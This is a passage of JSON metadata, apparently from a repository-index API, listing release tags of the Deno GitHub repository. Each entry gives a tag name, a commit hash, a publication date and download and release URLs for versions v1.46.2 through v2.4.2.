c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v